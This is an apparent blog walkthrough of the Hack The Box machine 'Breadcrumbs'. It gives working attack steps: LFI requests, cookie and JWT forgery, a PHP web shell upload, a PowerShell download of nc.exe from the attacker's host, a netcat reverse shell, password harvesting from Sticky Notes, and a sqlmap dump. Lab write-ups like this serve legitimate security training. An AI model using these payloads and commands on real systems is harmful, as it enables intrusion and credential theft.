Hack-The-Box-walkthrough[Breadcrumbs]

Posted on Edited on In Views: Word count in article: 2.5k Reading time ≈ 9 mins.

introduce

OS: Windows
Difficulty: Hard
Points: 40
Release: 20 Feb 2021
IP: 10.10.10.228

  • my htb rank

information gathering

first use nmap as usaul

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(root💀kali)-[~/hackthebox/machine/Breadcrumbs]
└─# nmap -sV -v -p- --min-rate=10000 10.10.10.228
PORT      STATE SERVICE       VERSION
22/tcp    open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
80/tcp    open  http          Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1h PHP/8.0.1)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp   open  ssl/http      Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1h PHP/8.0.1)
445/tcp   open  microsoft-ds?
3306/tcp  open  mysql?
5040/tcp  open  unknown
7680/tcp  open  pando-pub?
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.91%I=7%D=2/23%Time=6034FA27%P=x86_64-pc-linux-gnu%r(RP
SF:CCheck,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.12'\x20is\x20not\x20a
SF:llowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(X11Probe
SF:,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.12'\x20is\x20not\x20allowed
SF:\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Description

Lfi on books page by and making a post request to search a book, change request and change method variable to 1 and remove title and author and replace with book

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
POST /includes/bookController.php HTTP/1.1

Host: 10.10.10.228

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: close

Cookie: PHPSESSID=480ifp24jq5q4l14mepp0cgkif

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

Content-Length: 26



book=../index.php&method=1

Use read files
Find secret key for tokens and php for how cookie are made by looking at files for the portal sign

Read code for cookie. The phpsessid is created by md5 hashing string that has a random letter from the users name

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
POST /includes/bookController.php HTTP/1.1

Host: 10.10.10.228

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: close

Cookie: PHPSESSID=480ifp24jq5q4l14mepp0cgkif

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

Content-Length: 38



book=../portal/cookie.php&method=1

response

1
"<?php\r\n\/**\r\n * @param string $username  Username requesting session cookie\r\n * \r\n * @return string $session_cookie Returns the generated cookie\r\n * \r\n * @devteam\r\n * Please DO NOT use default PHPSESSID; our security team says they are predictable.\r\n * CHANGE SECOND PART OF MD5 KEY EVERY WEEK\r\n * *\/\r\nfunction makesession($username){\r\n    $max = strlen($username) - 1;\r\n    $seed = rand(0, $max);\r\n    $key = \"s4lTy_stR1nG_\".$username[$seed].\"(!528.\/9890\";\r\n    $session_cookie = $username.md5($key);\r\n\r\n    return $session_cookie;\r\n}"

Get Paul phpsessid

1
paul47200b180ccd6835d25d034eeb6e6390

get secret key

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
POST /includes/bookController.php HTTP/1.1

Host: 10.10.10.228

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: close

Cookie: PHPSESSID=480ifp24jq5q4l14mepp0cgkif

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

Content-Length: 34



book=../portal/authController.php&method=1

got secret key in response

1
$secret_key = '6cb9c1a2786a483ca5e44571dcc5f3bfa298593a6376ad92185c3258acd5591e';

create a new jwt token using the secret key you found now token is

1
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoicGF1bCJ9fQ.7pc5S1P76YsrWhi_gu23bzYLYWxqORkr0WtEz_IUtCU

Login portal with a random account, edit your cookies with the tokens refresh

Now Paul

get user

Go to file management and upload a php script in a file (maybe like reverseshell.html) and intercept with burpsuite and change the .zip at the bottom to .php if not work out title and author in like valid book http://10.10.10.228/books

due to upload button not working, view the following page to makeup file upload request package by yourself.

1
http://10.10.10.228/portal/assets/js/files.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
POST /portal/includes/fileController.php HTTP/1.1

Host: 10.10.10.228

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: close

Cookie: PHPSESSID=paul47200b180ccd6835d25d034eeb6e6390; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoicGF1bCJ9fQ.7pc5S1P76YsrWhi_gu23bzYLYWxqORkr0WtEz_IUtCU

Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW

Content-Length: 295



------WebKitFormBoundary7MA4YWxkTrZu0gW

Content-Disposition: form-data; name="file"; filename="shell.html"

Content-Type: text/html



<?php phpinfo();?>

------WebKitFormBoundary7MA4YWxkTrZu0gW

Content-Disposition: form-data; name="task"



test.php

------WebKitFormBoundary7MA4YWxkTrZu0gW--

responese

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
HTTP/1.1 200 OK

Date: Tue, 23 Feb 2021 16:37:26 GMT

Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.1

X-Powered-By: PHP/8.0.1

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate

Pragma: no-cache

Content-Length: 30

Connection: close

Content-Type: text/html; charset=UTF-8



Success. Have a great weekend!

now change the phpinfo() to the following, and add html garbage data above to get a shell

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php

system($_GET['cmd']);

?>

<h3>Title: Animal Farm</h3>

<p>Author: George Orwell </p>

<p style="color: red;">Max borrow duration: 8 days</p>

<p>About:<br>Animal Farm is an allegorical novella by George Orwell, first published in England on 17 August 1945. The book tells the story of a group of farm animals who rebel against their human farmer, hoping to create a society where the animals can be equal, free, and happy.</p>

go to http://10.10.10.228/portal/uploads can execute your file and now command execution

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
http://10.10.10.228/portal/uploads/luci.php?cmd=systeminfo


Host Name:                 BREADCRUMBS
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19041 N/A Build 19041
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          temp
Registered Organization:   
Product ID:                00331-20309-59368-AA373
Original Install Date:     1/15/2021, 3:27:37 PM
System Boot Time:          2/23/2021, 4:41:02 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC

now use nc to get a shell:

download nc:

1
2
3
4
┌──(root💀kali)-[~/hackthebox/machine/Breadcrumbs]
└─# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.228 - - [23/Feb/2021 12:30:00] "GET /nc.exe HTTP/1.1" 200 -
1
http://10.10.10.228/portal/uploads/luci.php?cmd=powershell%20(new-object%20Net.WebClient).DownloadFile(%27http://10.10.14.12/nc.exe%27,%27C:\\Users\\www-data\\Desktop\\xampp\\htdocs\\portal\\uploads\\nc.exe%27)

then get a reverse shell

1
http://10.10.10.228/portal/uploads/luci.php?cmd=nc.exe%2010.10.14.12%203221%20-e%20c:\windows\system32\cmd.exe
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
┌──(root💀kali)-[~]
└─# nc -lvp 3221
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::3221
Ncat: Listening on 0.0.0.0:3221
Ncat: Connection from 10.10.10.228.
Ncat: Connection from 10.10.10.228:50994.
Microsoft Windows [Version 10.0.19041.746]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\Users\www-data\Desktop\xampp\htdocs\portal\uploads>whoami
whoami
breadcrumbs\www-data

C:\Users\www-data\Desktop\xampp\htdocs\portal\uploads>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 7C07-CD3A

 Directory of C:\Users\www-data\Desktop\xampp\htdocs\portal\uploads

02/23/2021  09:41 AM    <DIR>          .
02/23/2021  09:41 AM    <DIR>          ..
02/23/2021  09:13 AM               437 luci.php
02/23/2021  09:41 AM            45,272 nc.exe
02/23/2021  08:37 AM                18 test.php
02/23/2021  09:04 AM               467 test11.php
               4 File(s)         46,194 bytes
               2 Dir(s)   6,313,857,024 bytes free

Look through folders and find a Juliette
Password

1
2
3
4
5
6
7
8
9
10
11
12
13
C:\Users\www-data\Desktop\xampp\htdocs\portal\pizzaDeliveryUserData>type juliette.json
type juliette.json
{
        "pizza" : "margherita",
        "size" : "large",
        "drink" : "water",
        "card" : "VISA",
        "PIN" : "9890",
        "alternate" : {
                "username" : "juliette",
                "password" : "jUli901./())!",
        }
}

Ssh the box, and got user flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
┌──(root💀kali)-[~/hackthebox/machine/Breadcrumbs]
└─# ssh juliette@10.10.10.228
juliette@10.10.10.228's password: 
Microsoft Windows [Version 10.0.19041.746]
(c) 2020 Microsoft Corporation. All rights reserved.
                                                    
juliette@BREADCRUMBS C:\Users\juliette>whoami       
breadcrumbs\juliette                   
                                       
juliette@BREADCRUMBS C:\Users\juliette>dir
 Volume in drive C has no label.                  
 Volume Serial Number is 7C07-CD3A                
                                                  
 Directory of C:\Users\juliette                   
                                                  
02/01/2021  05:48 AM    <DIR>          .          
02/01/2021  05:48 AM    <DIR>          ..         
01/15/2021  04:00 PM    <DIR>          3D Objects 
01/15/2021  04:00 PM    <DIR>          Contacts   
01/15/2021  04:04 PM    <DIR>          Desktop    
01/15/2021  04:00 PM    <DIR>          Documents  
01/15/2021  04:00 PM    <DIR>          Downloads  
01/15/2021  04:00 PM    <DIR>          Favorites  
01/15/2021  04:00 PM    <DIR>          Links      
01/15/2021  04:00 PM    <DIR>          Music      
01/15/2021  04:03 PM    <DIR>          OneDrive   
01/15/2021  04:00 PM    <DIR>          Pictures   
01/15/2021  04:00 PM    <DIR>          Saved Games
01/15/2021  04:00 PM    <DIR>          Searches   
01/15/2021  04:00 PM    <DIR>          Videos     
               0 File(s)              0 bytes     
              15 Dir(s)   6,313,771,008 bytes free
                                                  
juliette@BREADCRUMBS C:\Users\juliette>dir Desktop
 Volume in drive C has no label.         
 Volume Serial Number is 7C07-CD3A       
                                         
 Directory of C:\Users\juliette\Desktop  
                                         
01/15/2021  04:04 PM    <DIR>          . 
01/15/2021  04:04 PM    <DIR>          ..
12/09/2020  06:27 AM               753 todo.html
02/23/2021  04:42 AM                34 user.txt
               2 File(s)            787 bytes
               2 Dir(s)   6,313,771,008 bytes free

juliette@BREADCRUMBS C:\Users\juliette>type Desktop\user.txt
46c5036915d0f9a7dc2e480befc603d5

get administrator

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
juliette@BREADCRUMBS C:\Users\juliette\Desktop>type todo.html
<html>                                                     
<style>                                                    
html{                                                      
background:black;                                          
color:orange;                                              
}                                                          
table,th,td{                                               
border:1px solid orange;                                   
padding:1em;                                               
border-collapse:collapse;                                  
}                                                          
</style>                                                   
<table>                                                    
        <tr>                                               
            <th>Task</th>                                  
            <th>Status</th>                                
            <th>Reason</th>                                
        </tr>                                              
        <tr>                                               
            <td>Configure firewall for port 22 and 445</td>
            <td>Not started</td>                           
            <td>Unauthorized access might be possible</td> 
        </tr>                                              
        <tr>
            <td>Migrate passwords from the Microsoft Store Sticky Notes application to our new password manager</td>
            <td>In progress</td>
            <td>It stores passwords in plain text</td>
        </tr>
        <tr>
            <td>Add new features to password manager</td>
            <td>Not started</td>
            <td>To get promoted, hopefully lol</td>
        </tr>
</table>

</html>

now need development user
Go to the location on windows where sticky notes are and download the
plum.sqlite
plum.sqlite-shm
plum.sqlite-wal

1
2
3
4
5
6
7
8
9
10
11
12
13
14
juliette@BREADCRUMBS C:\Users\juliette\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState>dir
 Volume in drive C has no label.
 Volume Serial Number is 7C07-CD3A

 Directory of C:\Users\juliette\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState

01/15/2021  04:10 PM    <DIR>          .
01/15/2021  04:10 PM    <DIR>          ..
01/15/2021  04:10 PM            20,480 15cbbc93e90a4d56bf8d9a29305b8981.storage.session
11/29/2020  03:10 AM             4,096 plum.sqlite
01/15/2021  04:10 PM            32,768 plum.sqlite-shm
01/15/2021  04:10 PM           329,632 plum.sqlite-wal
               4 File(s)        386,976 bytes
               2 Dir(s)   6,313,762,816 bytes free

you can use msf to get a rev shell to download files,

Open sql (I copied back to my box using SMB)

Get all notes then ssh as development with password in note

1
2
3
juliette: jUli901./())!
development: fN3)sN5Ee@g
administrator: [MOVED]

Development

Go to C:\Development

There Linux binary
has useful information inside

1
2
3
4
5
6
7
8
9
10
11
12
13
development@BREADCRUMBS C:\Users\development>cd C:\Development

development@BREADCRUMBS C:\Development>dir
 Volume in drive C has no label.                    
 Volume Serial Number is 7C07-CD3A                  
                                                    
 Directory of C:\Development                        
                                                    
01/15/2021  04:03 PM    <DIR>          .            
01/15/2021  04:03 PM    <DIR>          ..           
11/29/2020  03:11 AM            18,312 Krypter_Linux
               1 File(s)         18,312 bytes       
               2 Dir(s)   6,310,158,336 bytes free

Krypter_Linux

ida open Krypter_Linux

Inside there is command and you can see what it does when on box you do

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
PS C:\Development> curl 'http://127.0.0.1:1234/index.php?method=select&username=administrator&table=passwords' -UseBasicParsing


StatusCode        : 200                                                                                               
StatusDescription : OK                                                                                                
Content           : selectarray(1) {                                                                                  
                      [0]=>                                                                                           
                      array(1) {                                                                                      
                        ["aes_key"]=>                                                                                 
                        string(16) "k19D193j.<19391("                                                                 
                      }                                                                                               
                    }                                                                                                 
                                                                                                                      
RawContent        : HTTP/1.1 200 OK                                                                                   
                    Keep-Alive: timeout=5, max=100                                                                    
                    Connection: Keep-Alive                                                                            
                    Content-Length: 96                                                                                
                    Content-Type: text/html; charset=UTF-8                                                            
                    Date: Tue, 23 Feb 2021 19:24:09 GMT                                                               
                    Server: Apache/2.4.46 (Win64) ...                                                                 
Forms             :                                                                                                   
Headers           : {[Keep-Alive, timeout=5, max=100], [Connection, Keep-Alive], [Content-Length, 96], [Content-Type, 
                    text/html; charset=UTF-8]...}                                                                     
Images            : {}                                                                                                
InputFields       : {}                                                                                                
Links             : {}                                                                                                
ParsedHtml        :                                                                                                   
RawContentLength  : 96

Gets aes key but can do sqlmaps through the url but port forward so you can do on kali

1
2
3
4
5
6
7
8
9
10
11
ssh -N -L 1234:127.0.0.1:1234 development@10.10.10.228

┌──(root💀kali)-[~/hackthebox/machine/Breadcrumbs]
└─# curl 'http://127.0.0.1:1234/index.php?method=select&username=administrator&table=passwords'
selectarray(1) {
  [0]=>
  array(1) {
    ["aes_key"]=>
    string(16) "k19D193j.<19391("
  }
}

Run sqlmaps with flag –dump against

1
2
3
4
5
6
7
8
9
10
sqlmap -u http://127.0.0.1:1234/index.php\?method\=select\&username\=administrator\&table\=passwords --dump

Database: bread
Table: passwords
[1 entry]
+----+---------------+------------------+----------------------------------------------+
| id | account       | aes_key          | password                                     |
+----+---------------+------------------+----------------------------------------------+
| 1  | Administrator | k19D193j.<19391( | H2dFz/jNwtSTWDURot9JBhWMP6XOdmcpgqvYHG35QKw= |
+----+---------------+------------------+----------------------------------------------+

gives out put string

1
H2dFz/jNwtSTWDURot9JBhWMP6XOdmcpgqvYHG35QKw=

With a key

1
k19D193j.<19391(

Base 64 decode string
After base 64 decrypt do aes decrypt
Use cyberchef with input and output mode raw
Key in Latin and IV in hex (iv =0000000000000000)

go to following cyberchef url:

1
https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',false)AES_Decrypt(%7B'option':'Latin1','string':'k19D193j.%3C19391('%7D,%7B'option':'Hex','string':'0000000000000000000000000000000'%7D,'CBC','Raw','Raw',%7B'option':'Hex','string':''%7D,%7B'option':'Hex','string':'undefined'%7D)&input=SDJkRnovak53dFNUV0RVUm90OUpCaFdNUDZYT2RtY3BncXZZSEczNVFLdz0

and finally get administrator’s password:

1
p@ssw0rd!@#$9890./

then get the root flag:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
┌──(root💀kali)-[~/hackthebox/machine/Breadcrumbs]
└─# ssh administrator@10.10.10.228
administrator@10.10.10.228's password: 
Microsoft Windows [Version 10.0.19041.746]
(c) 2020 Microsoft Corporation. All rights reserved.
                                                    
administrator@BREADCRUMBS C:\Users\Administrator>whoami
breadcrumbs\administrator                        
                                                 
administrator@BREADCRUMBS C:\Users\Administrator>dir
 Volume in drive C has no label.                  
 Volume Serial Number is 7C07-CD3A                
                                                  
 Directory of C:\Users\Administrator              
                                                  
01/26/2021  09:06 AM    <DIR>          .          
01/26/2021  09:06 AM    <DIR>          ..         
01/15/2021  03:56 PM    <DIR>          3D Objects 
01/15/2021  03:56 PM    <DIR>          Contacts   
02/09/2021  07:08 AM    <DIR>          Desktop    
01/15/2021  03:56 PM    <DIR>          Documents  
01/15/2021  03:56 PM    <DIR>          Downloads  
01/15/2021  03:56 PM    <DIR>          Favorites  
01/15/2021  03:56 PM    <DIR>          Links      
01/15/2021  03:56 PM    <DIR>          Music      
01/15/2021  04:00 PM    <DIR>          OneDrive   
01/15/2021  03:57 PM    <DIR>          Pictures   
01/15/2021  03:56 PM    <DIR>          Saved Games
01/15/2021  03:57 PM    <DIR>          Searches   
01/15/2021  03:56 PM    <DIR>          Videos     
               0 File(s)              0 bytes     
              15 Dir(s)   6,308,880,384 bytes free
                                                  
administrator@BREADCRUMBS C:\Users\Administrator>type Desktop\root.txt
a47ac3139f51cdd4a4d30614eb277101

Summary of knowledge

  • LFI
  • phpsessid and jwt token forge
  • makeup file upload request package bypass upload restriction
  • .sqlite leak password
  • ida analyse binary file
  • port forwarding
  • sqlmap dump secrets

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security reseacher, hacker, bug hunter and more…